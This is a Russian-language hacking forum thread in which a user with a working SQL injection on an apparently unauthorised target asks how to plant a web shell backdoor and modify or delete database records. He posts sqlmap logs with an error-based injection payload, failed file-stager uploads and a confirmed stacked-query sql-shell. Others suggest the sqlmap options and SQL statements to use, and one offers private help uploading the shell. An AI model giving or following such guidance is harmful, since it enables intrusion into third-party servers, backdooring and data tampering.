Sqlmap

[Fred89]

Кто знает можно ли менять данные не подключаясь Mysql.
Только через командную строку... sqlmap...
что можно делать имея рабочий sql...Доступ в админку есть но там ничего не сделаешь... доступ mysql не смог найти.


Интересует заливать шелл (бэкдор) на веб-сервер
изменять и удалять информацию из базы данных

 

[BabaDook]

Без взаимодействия с БД, у вас ничего не получится.

 

[Fred89]

Без взаимодействия с БД, у вас ничего не получится.

как понять ?

 

[Fred89]

[19:20:04] [WARNING] unable to upload the file stager on '/var/www/www/build/'
[19:20:04] [INFO] trying to upload the file stager on '/var/www/www/build/am/menu/(SELECT%203258%20FROM(SELECT%20COUNT(),CONCAT(0x71706a6271,(SELECT%20(ELT(3258=3258,1))),0x71766b6b71,FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)/' via LIMIT 'LINES TERMINATED BY' method
[19:20:04] [ERROR] unresolved variables '203258, 20FROM, 20GROUP' in SQL file 'write_file_limit'
do you want to provide the substitution values? [y/N]

 

[Fred89]

[19:26:20] [WARNING] unable to automatically parse any web server path
[19:26:20] [INFO] trying to upload the file stager on '/var/www/am/menu/' via LIMIT 'LINES TERMINATED BY' method
[19:26:22] [WARNING] reflective value(s) found and filtering out
[19:26:24] [WARNING] unable to upload the file stager on '/var/www/am/menu/'
[19:26:24] [INFO] trying to upload the file stager on '/var/www/am/menu/am/menu/(SELECT%203258%20FROM(SELECT%20COUNT(),CONCAT(0x71706a6271,(SELECT%20(ELT(3258=3258,1))),0x71766b6b71,FLOOR(RAND(0)2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)/' via LIMIT 'LINES TERMINATED BY' method
[19:26:24] [ERROR] unresolved variables '203258, 20FROM, 20GROUP' in SQL file 'write_file_limit'
do you want to provide the substitution values? [y/N]

 

[Distruzione]

изменять и удалять информацию из базы данных

можно при наличии раскрученной Stacked Queries. --sql-query="запрос" / --sql-shell

 

[Fred89]

оплачу 100вмз если поможете )

 

[BabaDook]

Ж

оплачу 100вмз если поможете )

Это не коммерческий раздел

 

[Fred89]

спасибо. создал тему... посмотрим кто нить сможет помочь ( видимо я что то не так делаю...

 

[Fred89]

можно при наличии раскрученной Stacked Queries. --sql-query="запрос" / --sql-shell

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)

 

[Fred89]

[03:34:25] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp437') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files
[03:34:25] [INFO] fetching SQL query output: '??????'
[03:34:25] [INFO] resumed: ''
??????: ''
[03:34:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>

 

[Gerron]

Если есть права ты можешь менять значения в таблицах, UPDATE или INSERT.
Заливать шелл можно через админку, если интересно, напиши мне в лс, попробую помочь